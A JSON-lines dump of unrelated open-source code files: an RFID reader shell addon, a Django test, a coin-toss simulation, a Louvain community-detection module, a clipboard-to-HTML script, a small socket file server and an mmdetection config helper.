preProcess=acr122SamAPDUBuilder.getResponse ,process=executeAPDU, argChecker=DefaultArgsChecker([(\"Length\",i)]), postProcess=resultHandlerAPDUAndPrintDataAndSW)\n\nt = tokenValueArgChecker({\"off\":False,\"on\":True,\"default\":None})\nt2 = tokenValueArgChecker({\"off\":acr122SamAPDUBuilder.LinkToBuzzerOff,\"t1\":acr122SamAPDUBuilder.LinkToBuzzerDuringT1,\"t2\":acr122SamAPDUBuilder.LinkToBuzzerDuringT2,\"both\":acr122SamAPDUBuilder.LinkToBuzzerDuringT1AndT2})\n\nExecuter.addCommand(CommandStrings=[\"acr122\",\"ledbuzzer\"], preProcess=acr122SamAPDUBuilder.ledAndBuzzerControl ,process=executeAPDU, 
argChecker=DefaultArgsChecker([(\"initialRed\",t),(\"initialGreen\",t),(\"finalRed\",t),(\"finalGreen\",t),(\"T1Duration\",i),(\"T2Duration\",i),(\"Repetition\",i),(\"LinkToBuzzer\",t2)]))\nExecuter.addCommand(CommandStrings=[\"acr122\",\"execute\"], preProcess=acr122execute ,process=executeAPDU, argChecker=AllTheSameChecker(hexaArgChecker(),\"args\"), postProcess=printResultHandler)\n\n\n","repo_name":"djoproject/old.RFIDShell","sub_path":"src/addons/acr122V1.py","file_name":"acr122V1.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"23448089295","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom capstoneproject.models.querysets.category_queryset \\\n import CategoryQuerySet\nfrom capstoneproject.models.models.category import Category\nfrom capstoneproject.models.models.user_storage import UserStorage\n\n\nclass CategoryQuerySetTestClass(TestCase):\n @classmethod\n def setUpClass(cls):\n cls.cat1 = Category.categories.create(\n name='test_category1', weight=1, default=True)\n cls.cat2 = Category.categories.create(\n name='test_category2', weight=2, default=True)\n cls.cat3 = Category.categories.create(\n name='test_category3', weight=3, default=False)\n cls.cat4 = Category.categories.create(\n name='test_category4', weight=0, default=False)\n cls.cat5 = Category.categories.create(\n name='test_category5', weight=1, default=True)\n cls.user1 = User.objects.create_user(\n username='user1', password='12345')\n cls.user1.save()\n cls.user2 = User.objects.create_user(\n username='user2', password='12346')\n cls.user2.save()\n cls.user_storage1 = UserStorage.user_storage.get(user=cls.user1)\n cls.user_storage1.categories.add(cls.cat1)\n cls.user_storage1.categories.add(cls.cat2)\n cls.user_storage1.categories.add(cls.cat3)\n cls.user_storage1.save()\n cls.user_storage2 = UserStorage.user_storage.get(user=cls.user2)\n cls.user_storage2.categories.add(cls.cat1)\n cls.user_storage2.categories.add(cls.cat2)\n cls.user_storage2.categories.add(cls.cat4)\n cls.user_storage2.save()\n\n @classmethod\n def tearDownClass(cls):\n Category.categories.all().delete()\n User.objects.all().delete()\n UserStorage.user_storage.all().delete()\n\n def test_of_user(self):\n results = Category.categories.of_user(self.user1.id)\n self.assertIn(self.cat1, results)\n self.assertIn(self.cat2, results)\n self.assertIn(self.cat3, results)\n self.assertNotIn(self.cat4, results)\n self.assertIn(self.cat5, results)\n","repo_name":"jwillikers/content-rating","sub_path":"capstoneproject/tests/test_models/test_querysets/test_category_queryset.py","file_name":"test_category_queryset.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"41953925389","text":"import random\n\ndef toss_coin(p):\n return 'heads' if random.random() < p else 'tails'\n\ndef five_heads_in_a_row():\n count = 0\n for i in range(100000):\n coin = 'fair' if random.random() < 0.9 else 'loaded'\n result = ''\n if coin == 'fair':\n p = 0.5\n else:\n p = 0.9\n for j in range(5):\n result += toss_coin(p)\n if result == 'heads'*5:\n count += 1\n return count/100000\n\nprint(five_heads_in_a_row())","repo_name":"fadouaabdoul/BDAnalysis","sub_path":"Homework 5/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} 
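A quick analytic cross-check of the five_heads_in_a_row() simulation in the record above (a minimal sketch; the helper name and keyword defaults are illustrative, not part of the original file). By the law of total probability, P(5 heads) = 0.9 * 0.5**5 + 0.1 * 0.9**5 = 0.087174, which is the value the Monte Carlo estimate should approach.

# Exact counterpart of the simulation above: condition on which coin was drawn.
def five_heads_exact(p_fair=0.9, p_head_fair=0.5, p_head_loaded=0.9, n=5):
    # P(n heads) = P(fair) * P(head|fair)^n + P(loaded) * P(head|loaded)^n
    return p_fair * p_head_fair ** n + (1 - p_fair) * p_head_loaded ** n

print(five_heads_exact())  # 0.087174, the target of the Monte Carlo estimate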
+{"seq_id":"20777876863","text":"from __future__ import division\nimport numpy as np\nimport os.path\n\n\"\"\"\nThis module implements community detection.\n\"\"\"\n\n__author__ = [\"Thomas Aynaud (thomas.aynaud@lip6.fr)\"]\n# Copyright (C) 2009 by\n# Thomas Aynaud \n# All rights reserved.\n# BSD license.\n\nimport networkx as nx\n\n\nclass ML2(object):\n __MIN = 0.000001\n __PASS_MAX = -1\n LOGOPERATIONS = False\n\n nbVertices = 0\n\n def __init__(self, graph, attributes, authorIndex):\n self.graph = graph\n self.graphBase = graph.copy()\n self.attributes = attributes\n self.nbVertices = len(graph)\n self.statusTab = []\n self.authorIndex = authorIndex\n\n # Build status structures\n status = Status()\n status.init(graph)\n self.statusTab.append(status)\n statusA = Status()\n statusA.initAttribStatus(graph, authorIndex, attributes)\n self.statusTab.append(statusA)\n\n self.status_list = list()\n\n def critereCombinaison(self):\n return (\n self.__modularity(self.statusTab[0]) + self.__modularity(self.statusTab[1])\n ) / 2.0\n\n def findPartition(self):\n giniMatrix = self.calculateGiniMatrixInitial()\n self.__one_level(giniMatrix=None)\n new_mod = self.critereCombinaison()\n\n partition, bijection = self.__renumber()\n\n self.status_list.append(partition)\n mod = new_mod\n self.induced_graph(partition)\n self.statusTab[0].init(self.graph)\n\n # if(args.verbose):\n # print(\"Inducing attrib status\")\n self.statusTab[1].inducedAttribStatusTab(partition, bijection)\n giniMatrix = self.firstInducedGiniMatrix(partition, giniMatrix)\n\n while True:\n self.__one_level(giniMatrix=giniMatrix)\n new_mod = self.critereCombinaison()\n if new_mod - mod < self.__MIN:\n break\n partition, bijection = self.__renumber()\n\n self.status_list.append(partition)\n\n mod = new_mod\n self.induced_graph(partition)\n giniMatrix = self.inducedGiniMatrix(partition, giniMatrix)\n\n self.statusTab[0].init(self.graph)\n\n if self.statusTab[1] != None:\n self.statusTab[1].inducedAttribStatusTab(partition, bijection)\n\n dendogram = self.status_list[:]\n\n # Generate and output partition\n partition = dendogram[0].copy()\n for index in range(1, len(dendogram)):\n for node, community in partition.items():\n partition[node] = dendogram[index][community]\n\n return partition\n\n def dist(self, v1, v2):\n attrV1 = self.attributes[v1]\n attrV2 = self.attributes[v2]\n distance = 0.0\n for attr, val1 in attrV1.items():\n val2 = attrV2.get(attr, 0.0)\n distance += (val1 - val2) ** 2\n for attr, val2 in attrV2.items():\n if not attr in attrV1:\n distance += val2 * val2\n return distance\n\n def distArray(self, v1, v2):\n attrV1 = self.attributes[v1]\n attrV2 = self.attributes[v2]\n distance = 0.0\n for i in range(len(attrV1)):\n distance += (attrV1[i] - attrV2[i]) ** 2\n return distance\n\n def firstInducedGiniMatrix(self, partition, giniMatrix):\n out = np.zeros([len(set(partition.values())), len(set(partition.values()))])\n # if(args.verbose):\n # pprint(giniMatrix)\n for i in partition:\n for j in partition:\n out[partition[i]][partition[j]] = giniMatrix[self.authorIndex[i]][\n self.authorIndex[j]\n ]\n return out\n\n def inducedGiniMatrix(self, partition, giniMatrix):\n # if(args.verbose):\n # print(\"inducedGiniMatrix...\")\n out = np.zeros([len(set(partition.values())), len(set(partition.values()))])\n for i in partition:\n for j in partition:\n out[partition[i]][partition[j]] = (\n out[partition[i]][partition[j]] + giniMatrix[i][j]\n )\n # if(args.verbose):\n # print(\"End inducedGiniMatrix\")\n\n return out\n\n def 
calculateGiniMatrixInitial(self):\n giniMatrix = {}\n for v1 in self.graph:\n giniMatrix[self.authorIndex[v1]] = {}\n np.zeros(self.nbVertices**2).reshape((self.nbVertices, self.nbVertices))\n for v1 in self.graph:\n for v2 in self.graph:\n d = (\n -1\n * self.dist(self.authorIndex[v1], self.authorIndex[v2])\n / self.nbVertices**2\n )\n giniMatrix[self.authorIndex[v1]][self.authorIndex[v2]] = d\n giniMatrix[self.authorIndex[v2]][self.authorIndex[v1]] = d\n \"\"\"\n print \"Calculating Gini Matrix Initial\"\n Y = pdist(self.attributes, 'sqeuclidean')\n print \"division\"\n Y = np.divide(Y, 0.0-float(len(self.attributes)**2))\n pprint(giniMatrix)\n pprint(squareform(Y))\n return squareform(Y)\n \"\"\"\n return giniMatrix\n\n def induced_graph(self, partition):\n newGraph = nx.Graph()\n newGraph.add_nodes_from(partition.values())\n\n # for node1, node2, datas in self.graph.edges_iter(data = True) :\n for node1, node2, datas in list(self.graph.edges(data=True)):\n weight = datas.get(\"weight\", 1)\n com1 = partition[node1]\n com2 = partition[node2]\n w_prec = newGraph.get_edge_data(com1, com2, {\"weight\": 0}).get(\"weight\", 1)\n newGraph.add_edge(com1, com2, weight=w_prec + weight)\n self.graph = newGraph\n\n def __renumber(self):\n count = 0\n dictionary = self.statusTab[0].node2com\n ret = dictionary.copy()\n new_values = dict([])\n for key in dictionary.keys():\n value = dictionary[key]\n new_value = new_values.get(value, -1)\n if new_value == -1:\n new_values[value] = count\n new_value = count\n count = count + 1\n ret[key] = new_value\n return ret, new_values\n\n def __one_level(self, giniMatrix=None):\n modif = True\n\n while modif:\n modif = False\n numNode = 0\n for node in self.graph.nodes():\n numNode = numNode + 1\n\n com_node = self.statusTab[0].node2com[node]\n best_com = com_node\n\n best_increase = 0\n neigh_communities = self.__neighcom(node, giniMatrix=giniMatrix)\n # if(args.verbose):\n # print(\"Neighb Communities of \" + str(node))\n # pprint(neigh_communities)\n\n degc_totw_tab = []\n\n for i in range(len(self.statusTab)):\n\n degc_totw_tab.append(\n self.statusTab[i].gdegrees.get(node, 0.0)\n / (self.statusTab[i].total_weight * 2.0)\n )\n theWeight = neigh_communities[com_node][i]\n\n if abs(self.statusTab[i].degrees[com_node]) <= abs(\n self.statusTab[i].gdegrees[node]\n ):\n self.statusTab[i].degrees[com_node] = abs(\n self.statusTab[i].gdegrees[node]\n )\n\n self.__remove(node, com_node, theWeight, self.statusTab[i])\n assert (\n self.statusTab[0].node2com[node] == self.statusTab[1].node2com[node]\n )\n\n # Find the best community\n for com, dnc in neigh_communities.items():\n incr = 0.0\n for i in range(len(self.statusTab)):\n totw = abs(self.statusTab[i].total_weight)\n if i == 0:\n a = (\n abs(dnc[i])\n - abs(\n self.statusTab[i].degrees.get(com, 0.0)\n * degc_totw_tab[i]\n )\n ) / totw\n incr += a\n else:\n a = (\n 0.0\n - abs(dnc[i])\n + abs(\n self.statusTab[i].degrees.get(com, 0.0)\n * degc_totw_tab[i]\n )\n ) / totw\n incr += a\n incr /= 2\n if incr > best_increase:\n best_increase = incr\n best_com = com\n\n for i in range(len(self.statusTab)):\n if best_com in neigh_communities:\n theWeight = neigh_communities[best_com][i]\n else:\n print(\n \"IS THAT POSSIBLE ???? 
(best_com not in neigh_communities)\"\n )\n exit(0)\n theWeight = 0\n self.__insert(node, best_com, theWeight, self.statusTab[i])\n\n if best_com != com_node:\n modif = True\n\n def __neighcom(self, node, giniMatrix=None):\n weights = {}\n voisins = self.graph[node].items()\n curCommunity = self.statusTab[0].node2com[node]\n if curCommunity not in weights:\n weights[curCommunity] = np.zeros([len(self.statusTab)])\n\n for neighbor, datas in voisins:\n if neighbor != node:\n weight = datas.get(\"weight\", 1)\n neighborcom = self.statusTab[0].node2com[neighbor]\n\n if neighborcom not in weights:\n weights[neighborcom] = np.zeros([len(self.statusTab)])\n\n # For the graph\n weights[neighborcom][0] = weights[neighborcom][0] + weight\n\n # For the attributes\n if giniMatrix is not None:\n weight = giniMatrix[node][neighbor]\n else:\n weight = (\n -1\n * self.dist(self.authorIndex[node], self.authorIndex[neighbor])\n / self.nbVertices**2\n )\n weights[neighborcom][1] = weights[neighborcom][1] + weight\n return weights\n\n def __remove(self, node, com, weight, status):\n status.degrees[com] = status.degrees.get(com, 0.0) - status.gdegrees.get(\n node, 0.0\n )\n status.internals[com] = float(\n status.internals.get(com, 0.0) - weight - status.loops.get(node, 0.0)\n )\n status.node2com[node] = -1\n\n def __insert(self, node, com, weight, status):\n status.node2com[node] = com\n status.degrees[com] = status.degrees.get(com, 0.0) + status.gdegrees.get(\n node, 0.0\n )\n status.internals[com] = float(\n status.internals.get(com, 0.0) + weight + status.loops.get(node, 0.0)\n )\n\n def __modularity(self, status):\n links = abs(float(status.total_weight))\n result = 0.0\n for community in set(status.node2com.values()):\n in_degree = abs(status.internals.get(community, 0.0))\n degree = abs(status.degrees.get(community, 0.0))\n expected = (degree / (2.0 * links)) ** 2\n found = in_degree / links\n if status.total_weight < 0:\n result += expected - found\n else:\n result += found - expected\n return result\n\n\nclass Status(object):\n \"\"\"\n To handle several data in one struct.\n Could be replaced by named tuple, but don't want to depend on python 2.6\n \"\"\"\n\n node2com = dict([])\n total_weight = 0\n internals = dict([])\n degrees = dict([])\n gdegrees = dict([])\n loops = dict([])\n\n def __str__(self):\n return (\n \"------------------------\\nnode2com : \"\n + str(self.node2com)\n + \"\\n degrees : \"\n + str(self.degrees)\n + \"\\n gdegrees : \"\n + str(self.gdegrees)\n + \"\\n internals : \"\n + str(self.internals)\n + \"\\n total_weight : \"\n + str(self.total_weight)\n + \"\\n loops:\"\n + str(self.loops)\n + \"\\n-----------------------\"\n )\n\n def initAttribStatus(self, graph, authorIndex, attributes):\n \"\"\"Initialize the status of an attributes list with every node in one community\"\"\"\n N = len(graph)\n count = 0\n\n # Compute the center of gravity using dict\n meanVector = {}\n for v, attrs in attributes.items():\n for attrId, attrValue in attrs.items():\n meanVector[attrId] = meanVector.get(attrId, 0.0) + attrValue\n for attrId, attrValue in meanVector.items():\n meanVector[attrId] = meanVector[attrId] / N\n\n variance = {}\n for node in sorted(graph.nodes()):\n for attrId, attrValue in meanVector.items():\n variance[attrId] = variance.get(attrId, 0.0) + (\n (attrValue - attributes[authorIndex[node]].get(attrId, 0.0)) ** 2\n )\n inertieTot = 0.0\n for v in variance.values():\n inertieTot += v / N\n\n self.total_weight = 0.0 - inertieTot\n\n for node in sorted(graph.nodes()):\n 
self.node2com[node] = count\n\n # Compute the distance to the center of gravity\n distanceToCenterOfGravity = 0.0\n for attrId, attrValue in meanVector.items():\n distanceToCenterOfGravity += (\n attrValue - attributes[authorIndex[node]].get(attrId, 0.0)\n ) ** 2\n\n phiHuyghens = -1 * (inertieTot + distanceToCenterOfGravity) / N\n # if(args.verbose):\n # print(\"# phiHuyghens(\" + str(node) + \") = \" + str(phiHuyghens))\n self.degrees[count] = phiHuyghens\n self.gdegrees[node] = phiHuyghens\n self.loops[node] = 0\n self.internals[count] = self.loops[node]\n count = count + 1\n\n def inducedAttribStatusTab(self, node2com, bijection):\n # if(args.verbose):\n # print(self)\n retrobijection = {}\n for k, v in bijection.items():\n retrobijection[v] = k\n self.node2com = dict([])\n oldDegrees = self.degrees\n oldInternals = self.internals\n\n self.degrees = dict([])\n self.gdegrees = dict([])\n self.internals = dict([])\n self.node2com = dict([])\n self.loops = dict([])\n\n for node in retrobijection:\n self.node2com[node] = node\n deg = oldDegrees[retrobijection[node]]\n self.degrees[node] = deg\n self.gdegrees[node] = deg\n self.loops[node] = oldInternals[retrobijection[node]]\n self.internals[node] = self.loops[node]\n\n def init(self, graph):\n \"\"\"Initialize the status of a graph with every node in one community\"\"\"\n count = 0\n self.node2com = dict([])\n self.degrees = dict([])\n self.gdegrees = dict([])\n self.internals = dict([])\n self.total_weight = graph.size(weight=\"weight\")\n for node in sorted(graph.nodes()):\n self.node2com[node] = count\n deg = float(graph.degree(node, weight=\"weight\"))\n self.degrees[count] = deg\n self.gdegrees[node] = deg\n self.loops[node] = float(\n graph.get_edge_data(node, node, {\"weight\": 0}).get(\"weight\", 1)\n )\n self.internals[count] = self.loops[node]\n count = count + 1\n\n\ndef loadDataset(path):\n graph = nx.Graph()\n\n # Read the graph\n if not os.path.isfile(path + \".edgeList\"):\n print(\"Error: file '\" + path + \".edgeList' not found\")\n exit(-1)\n with open(path + \".edgeList\") as f:\n for line in f.readlines():\n v1 = int(line.split(\" \")[0])\n v2 = int(line.split(\" \")[1])\n graph.add_node(v1)\n graph.add_node(v2)\n graph.add_edge(v1, v2)\n\n # Read the attributes\n attributes = {}\n for n in graph:\n attributes[n] = {}\n\n if not os.path.isfile(path + \".attributes\"):\n print(\"Error: file '\" + path + \".attributes' not found\")\n exit(-1)\n\n with open(path + \".attributes\") as f:\n for line in f.readlines():\n vertexId = int(line.split(\" \")[0])\n elems = line.split(\" \")[1].split(\",\")\n i = 0\n attrValues = {}\n for attrValue in elems:\n attrValues[i] = float(attrValue)\n i = i + 1\n attributes[vertexId] = attrValues\n\n # Build authorIndex\n authorIndex = {}\n for n in graph:\n authorIndex[n] = n\n\n # if(args.verbose):\n # print(\"# Finished reading dataset\")\n if os.path.exists(path + \".2ModLouvain\"):\n os.remove(path + \".2ModLouvain\")\n\n return graph, attributes, authorIndex\n","repo_name":"GiulioRossetti/cdlib","sub_path":"cdlib/algorithms/internal/ILouvain.py","file_name":"ILouvain.py","file_ext":"py","file_size_in_byte":17301,"program_lang":"python","lang":"en","doc_type":"code","stars":328,"dataset":"github-code","pt":"84"} +{"seq_id":"42578462692","text":"import logging\nfrom copy import deepcopy\n\n#logger = logging.getLogger('segmentation')\n\nclass Config:\n \"\"\"\n Stores the content of config.ini using deepcopy(without changing the source)\n \"\"\"\n __config = {}\n\n @staticmethod\n def 
get(name):\n \"\"\"\n Returns the value for the given name.\n \n Args:\n name (str): key of the specific value in the dictionary (which stores config settings).\n \n Returns:\n A deep copy of the value from the dictionary using the given key (name).\n \n Raises:\n KeyError: If the config setting doesn't exist.\n \"\"\"\n try:\n return deepcopy(Config.__config[name])\n except KeyError:\n #logger.warning(\"Config setting \" + name + \" not found.\")\n return None\n \n @staticmethod\n def set(name, value):\n \"\"\"\n Sets the value of a specific config setting.\n Args:\n name (string): Name of the config setting (key in dictionary).\n value (str/int/bool/float/Path): the value to store under the given name.\n \"\"\"\n try:\n Config.__config[name] = deepcopy(value)\n except Exception:\n # Fall back to storing the value itself if it cannot be deep-copied.\n Config.__config[name] = value","repo_name":"abdulqadirs/table-extraction","sub_path":"deep-splitting-merging/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"84"} +{"seq_id":"9342170454","text":"# This script marks the existing text content of a Windows\n# clipboard as HTML. This is useful to automate copy/paste of\n# the formatted code from gVIM to Outlook, a blog post, etc.\n\n# Clipboard stuff from http://code.activestate.com/recipes/474121/\n\nimport re\nimport win32clipboard\n\nclass HtmlClipboard:\n\n CF_HTML = None\n\n MARKER_BLOCK_OUTPUT = \\\n \"Version:1.0\\r\\n\" \\\n \"StartHTML:%09d\\r\\n\" \\\n \"EndHTML:%09d\\r\\n\" \\\n \"StartFragment:%09d\\r\\n\" \\\n \"EndFragment:%09d\\r\\n\" \\\n \"StartSelection:%09d\\r\\n\" \\\n \"EndSelection:%09d\\r\\n\" \\\n \"SourceURL:%s\\r\\n\"\n\n MARKER_BLOCK_EX = \\\n \"Version:(\\S+)\\s+\" \\\n \"StartHTML:(\\d+)\\s+\" \\\n \"EndHTML:(\\d+)\\s+\" \\\n \"StartFragment:(\\d+)\\s+\" \\\n \"EndFragment:(\\d+)\\s+\" \\\n \"StartSelection:(\\d+)\\s+\" \\\n \"EndSelection:(\\d+)\\s+\" \\\n \"SourceURL:(\\S+)\"\n MARKER_BLOCK_EX_RE = re.compile(MARKER_BLOCK_EX)\n\n MARKER_BLOCK = \\\n \"Version:(\\S+)\\s+\" \\\n \"StartHTML:(\\d+)\\s+\" \\\n \"EndHTML:(\\d+)\\s+\" \\\n \"StartFragment:(\\d+)\\s+\" \\\n \"EndFragment:(\\d+)\\s+\" \\\n \"SourceURL:(\\S+)\"\n MARKER_BLOCK_RE = re.compile(MARKER_BLOCK)\n\n DEFAULT_HTML_BODY = \\\n \"\" \\\n \"%s\"\n\n def __init__(self):\n self.html = None\n self.fragment = None\n self.selection = None\n self.source = None\n self.htmlClipboardVersion = None\n\n\n def GetCfHtml(self):\n \"\"\"\n Return the FORMATID of the HTML format\n \"\"\"\n if self.CF_HTML is None:\n self.CF_HTML = win32clipboard.RegisterClipboardFormat(\"HTML Format\")\n\n return self.CF_HTML\n\n\n def GetFromClipboard(self):\n \"\"\"\n Read and decode the HTML from the clipboard\n \"\"\"\n\n try:\n win32clipboard.OpenClipboard(0)\n src = win32clipboard.GetClipboardData(self.GetCfHtml())\n self.DecodeClipboardSource(src)\n finally:\n win32clipboard.CloseClipboard()\n\n\n def PutFragment(self, fragment, selection=None, html=None, source=None):\n \"\"\"\n Put the given well-formed fragment of Html into the clipboard.\n\n selection, if given, must be a literal string within fragment.\n html, if given, must be a well-formed Html document that textually\n contains fragment and its required markers.\n \"\"\"\n if selection is None:\n selection = fragment\n if html is None:\n html = self.DEFAULT_HTML_BODY % fragment\n if source is None:\n source = \"file://cliphtml.vim\"\n\n fragmentStart = html.index(fragment)\n fragmentEnd = fragmentStart + len(fragment)\n selectionStart = html.index(selection)\n selectionEnd = selectionStart + 
len(selection)\n self.PutToClipboard(html, fragmentStart, fragmentEnd, selectionStart, selectionEnd, source)\n\n\n def PutToClipboard(self, html, fragmentStart, fragmentEnd, selectionStart, selectionEnd, source=\"None\"):\n \"\"\"\n Replace the Clipboard contents with the given html information.\n \"\"\"\n\n try:\n win32clipboard.OpenClipboard(0)\n win32clipboard.EmptyClipboard()\n src = self.EncodeClipboardSource(html, fragmentStart, fragmentEnd, selectionStart, selectionEnd, source)\n #print src\n win32clipboard.SetClipboardData(self.GetCfHtml(), src)\n finally:\n win32clipboard.CloseClipboard()\n\n\n def EncodeClipboardSource(self, html, fragmentStart, fragmentEnd, selectionStart, selectionEnd, source):\n \"\"\"\n Join all our bits of information into a string formatted as per the HTML format specs.\n \"\"\"\n # How long is the prefix going to be?\n dummyPrefix = self.MARKER_BLOCK_OUTPUT % (0, 0, 0, 0, 0, 0, source)\n lenPrefix = len(dummyPrefix)\n\n prefix = self.MARKER_BLOCK_OUTPUT % (lenPrefix, len(html)+lenPrefix,\n fragmentStart+lenPrefix, fragmentEnd+lenPrefix,\n selectionStart+lenPrefix, selectionEnd+lenPrefix,\n source)\n return (prefix + html)\n\n\n# Get the (assumedly) HTML code from the clipboard, as text\nwin32clipboard.OpenClipboard(0)\ntext = win32clipboard.GetClipboardData()\n\n# Put it back on the clipboard, now marking as HTML\nHtmlClipboard().PutFragment(text)\n","repo_name":"glexey/vim_html_paste","sub_path":"clip2html.py","file_name":"clip2html.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33148702735","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n \"\"\"\n Cyclic iteration.\n\n Form a virtual cycle from each list, by connecting the tail of list A\n to the head of list B. Assuming list A's part1 has x length, list B's\n part1 has y length, and the shared part has z length.\n Then node a would traverse (x + y + z) length, and same for node b, so\n they will meet at the intersection.\n If there is no itersection, they will meet at 'None'.\n The key here is to step through 'None' as a Node.\n\n Time: O(n + m) where n and m is the length of two lists, respectively\n Space: O(1)\n \"\"\"\n a, b = headA, headB\n while a != b:\n a = a.next if a else headB\n b = b.next if b else headA\n return a","repo_name":"hukun01/LeetCode","sub_path":"easy/160. Intersection of Two Linked Lists.py","file_name":"160. 
Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"18078260186","text":"import socket\n\nhost: str = \"localhost\"\nport: int = 5000\n\nmy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET -> IP4\n\nmy_socket.bind((host, port))\nmy_socket.listen(1)\nprint(\"Server is listening on port:\", str(port))\nconnection, address = my_socket.accept()\n\nfile_name: str = connection.recv(1024).decode()\n\ntry:\n file = open(file_name, \"rb\")\n content = file.read()\n connection.send(content)\n file.close()\nexcept FileNotFoundError:\n print(\"File does not exist\")\n connection.send(\"File does not exist\".encode())\n\nconnection.close()\n","repo_name":"DanielW1987/python-basics","sub_path":"python_013_networking/socket/FileServer.py","file_name":"FileServer.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33507126326","text":"from mmdet.utils import (replace_cfg_vals, setup_multi_processes, update_data_root)\nfrom mmdet.utils import (collect_env, get_root_logger, get_device, compat_cfg)\nfrom mmdet.apis import init_random_seed, set_random_seed\nfrom mmdet.datasets import replace_ImageToTensor\nfrom dataclasses import dataclass, field\nfrom dotenv import load_dotenv\nfrom mmcv import Config\nimport os.path as osp\nimport time\nimport mmcv\nimport os\n\nload_dotenv()\n\n\n@dataclass\nclass Configuration:\n base_file: dict\n config_file: str = field(default=None)\n cfg: Config = field(default=None)\n device: str = field(default=\"cpu\")\n batch_size: str = field(default=64)\n\n def __post_init__(self):\n self.config_file = f\"\"\"{os.getenv(\"CONFIG_PATH\")}/{self.base_file[\"name\"]}/{self.base_file[\"fine_tune\"][\"name\"]}.py\"\"\"\n self.cfg = Config.fromfile(self.config_file)\n\n self.cfg.load_from = self.base_file[\"fine_tune\"][\"load_from\"]\n self.cfg.work_dir = f\"\"\"{os.getenv(\"WORK_DIR\")}/{self.base_file[\"name\"]}/{self.base_file[\"version\"\n ]}/{self.base_file[\"datasets\"][\"name\"]}/{self.base_file[\"iteration\"]}/{self.base_file[\"datasets\"][\"fold\"]}\"\"\"\n\n self.config_dataset(self.cfg.dataset_type)\n\n self.cfg = replace_cfg_vals(self.cfg)\n self.cfg.device = os.getenv(\"DEVICE\")\n self.device = os.getenv(\"DEVICE\")\n\n # update data root according to MMDET_DATASETS\n update_data_root(self.cfg)\n\n # set multi-process settings\n setup_multi_processes(self.cfg)\n\n self.cfg.optimizer.lr = self.base_file[\"optimizer\"][\"lr\"]\n self.cfg.optimizer.momentum = self.base_file[\"optimizer\"][\"momentum\"]\n\n self.cfg.checkpoint_config.interval = self.base_file[\"optimizer\"][\"interval\"]\n\n mmcv.mkdir_or_exist(osp.abspath(self.cfg.work_dir))\n\n # Set random seed for reproducible results.\n seed = init_random_seed(0, device=self.cfg.device)\n set_random_seed(seed)\n self.cfg.seed = seed\n self.cfg.runner.max_epochs = self.base_file[\"runner\"][\"max_epochs\"]\n\n # dump config\n self.cfg.dump(osp.join(self.cfg.work_dir, osp.basename(self.config_file)))\n\n def config_dataset(self, dataset_type: str = \"voc\"):\n if \"voc\" in dataset_type.lower():\n self.cfg.dataset_type = \"VOCDataset\"\n dataset_type = \"voc\"\n elif \"coco\" in dataset_type.lower():\n self.cfg.dataset_type = \"CocoDataset\"\n dataset_type = \"coco\"\n\n data_path = self.base_file[\"datasets\"][\"paths\"][dataset_type]\n self.cfg.data.train.ann_file 
= data_path[\"train\"][\"ann_file\"]\n self.cfg.data.train.img_prefix = data_path[\"train\"][\"img_prefix\"]\n\n self.cfg.data.val.type = self.cfg.dataset_type\n self.cfg.data.val.ann_file = data_path[\"val\"][\"ann_file\"]\n self.cfg.data.val.img_prefix = data_path[\"val\"][\"img_prefix\"]\n\n self.cfg.data.test.type = self.cfg.dataset_type\n self.cfg.data.test.ann_file = data_path[\"test\"][\"ann_file\"]\n self.cfg.data.test.img_prefix = data_path[\"test\"][\"img_prefix\"]\n\n if self.cfg.data.train.type == \"MultiImageMixDataset\":\n if \"classes\" in self.cfg.data.train:\n self.cfg.data.train.pop(\"classes\")\n self.cfg.data.train.pop(\"ann_file\")\n self.cfg.data.train.pop(\"img_prefix\")\n\n self.cfg.data.train.dataset.type = self.cfg.dataset_type\n self.cfg.data.train.dataset.ann_file = data_path[\"train\"][\"ann_file\"]\n self.cfg.data.train.dataset.img_prefix = data_path[\"train\"][\"img_prefix\"]\n else:\n self.cfg.data.train.type = self.cfg.dataset_type\n\n def load_config_for_train(self) -> dict:\n timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n log_file = osp.join(self.cfg.work_dir, f'{timestamp}.log')\n logger = get_root_logger(log_file=log_file, log_level=self.cfg.log_level)\n\n # init the meta dict to record some important information such as\n # environment info and seed, which will be logged\n meta = dict()\n\n self.cfg.data.workers_per_gpu = int(self.base_file[\"workers\"])\n self.cfg.data.samples_per_gpu = int(self.base_file[\"workers\"])\n\n # log env info\n env_info_dict = collect_env()\n env_info = '\\n'.join([f'{k}: {v}' for k, v in env_info_dict.items()])\n dash_line = '-' * 60 + '\\n'\n logger.info('Environment info:\\n' + dash_line + env_info + '\\n' + dash_line)\n\n meta['env_info'] = env_info\n meta['config'] = self.cfg.pretty_text\n\n # log some basic info\n logger.info(f'Distributed training: {False}')\n logger.info(f'Config:\\n{self.cfg.pretty_text}')\n\n # set random seeds\n meta['seed'] = self.cfg.seed\n\n return {\n \"cfg\": self.cfg,\n \"timestamp\": timestamp,\n \"meta\": meta\n }\n\n def load_config_for_test(self, dataset_type: str = \"voc\") -> Config:\n self.cfg = replace_cfg_vals(self.cfg)\n self.config_dataset(dataset_type)\n\n # update data root according to MMDET_DATASETS\n 